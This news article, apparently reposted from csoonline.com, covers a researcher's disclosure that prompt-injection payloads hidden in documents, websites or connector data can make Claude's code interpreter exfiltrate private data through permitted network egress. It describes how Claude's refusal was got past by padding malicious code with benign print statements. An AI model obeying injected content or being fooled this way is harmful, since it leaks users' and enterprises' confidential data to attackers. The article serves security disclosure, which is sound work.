Claude AI vulnerability exposes enterprise data through code interpreter exploit

Bypassing AI safety controls: Rehberger’s report stated that developing a reliable exploit proved challenging due to Claude’s built-in safety mechanisms. The AI initially refused requests containing plaintext API keys, recognizing them as suspicious. However, Rehberger added that mixing malicious code with benign instructions, such as simple print statements, was sufficient to bypass these safeguards.”I tried tricks like XOR and base64 encoding. None worked reliably,” Rehberger explained. “However, I found a way around it”¦ I just mixed in a lot of benign code, like print (‘Hello, world’), and that convinced Claude that not too many malicious things are happening.”Rehberger disclosed the vulnerability to Anthropic through HackerOne on October 25, 2025. The company closed the report within an hour, classifying it as out of scope and describing it as a model safety issue rather than a security vulnerability.Rehberger disputed this categorization. “I do not believe this is just a safety issue, but a security vulnerability with the default network egress configuration that can lead to exfiltration of your private information,” he wrote. “Safety protects you from accidents. Security protects you from adversaries.”Anthropic did not immediately respond to a request for comment.

Attack vectors and real-world risk: The vulnerability can be exploited through multiple entry points, the blog post added. “Malicious actors could embed prompt injection payloads in documents shared for analysis, websites users ask Claude to summarize, or data accessed through Model Context Protocol (MCP) servers and Google Drive integrations,” the blog added.Organizations using Claude for sensitive tasks, such as analyzing confidential documents, processing customer data, or accessing internal knowledge bases, face particular risk. The attack leaves minimal traces, as the exfiltration occurs through legitimate API calls that blend with normal Claude operations.For enterprises, mitigation options remain limited. Users can disable network access entirely or manually configure allow-lists for specific domains, though this significantly reduces Claude’s functionality. Anthropic recommends monitoring Claude’s actions and manually stopping execution if suspicious behavior is detected, an approach Rehberger characterizes as “living dangerously.”The company’s security documentation also acknowledges the risk: “This means Claude can be tricked into sending information from its context (for example, prompts, projects, data via MCP, Google integrations) to malicious third parties,” Rehberger noted.However, enterprises may incorrectly assume the default “Package managers only” configuration provides adequate protection. Rehberger’s research demonstrated that the assumption is false. Rehberger has not published the complete exploit code to protect users while the vulnerability remains unpatched. He noted that other domains on Anthropic’s approved list may present similar exploitation opportunities.

First seen on csoonline.com

Jump to article: www.csoonline.com/article/4082514/claude-ai-vulnerability-exposes-enterprise-data-through-code-interpreter-exploit.html

Claude AI vulnerability exposes enterprise data through code interpreter exploit

also interesting: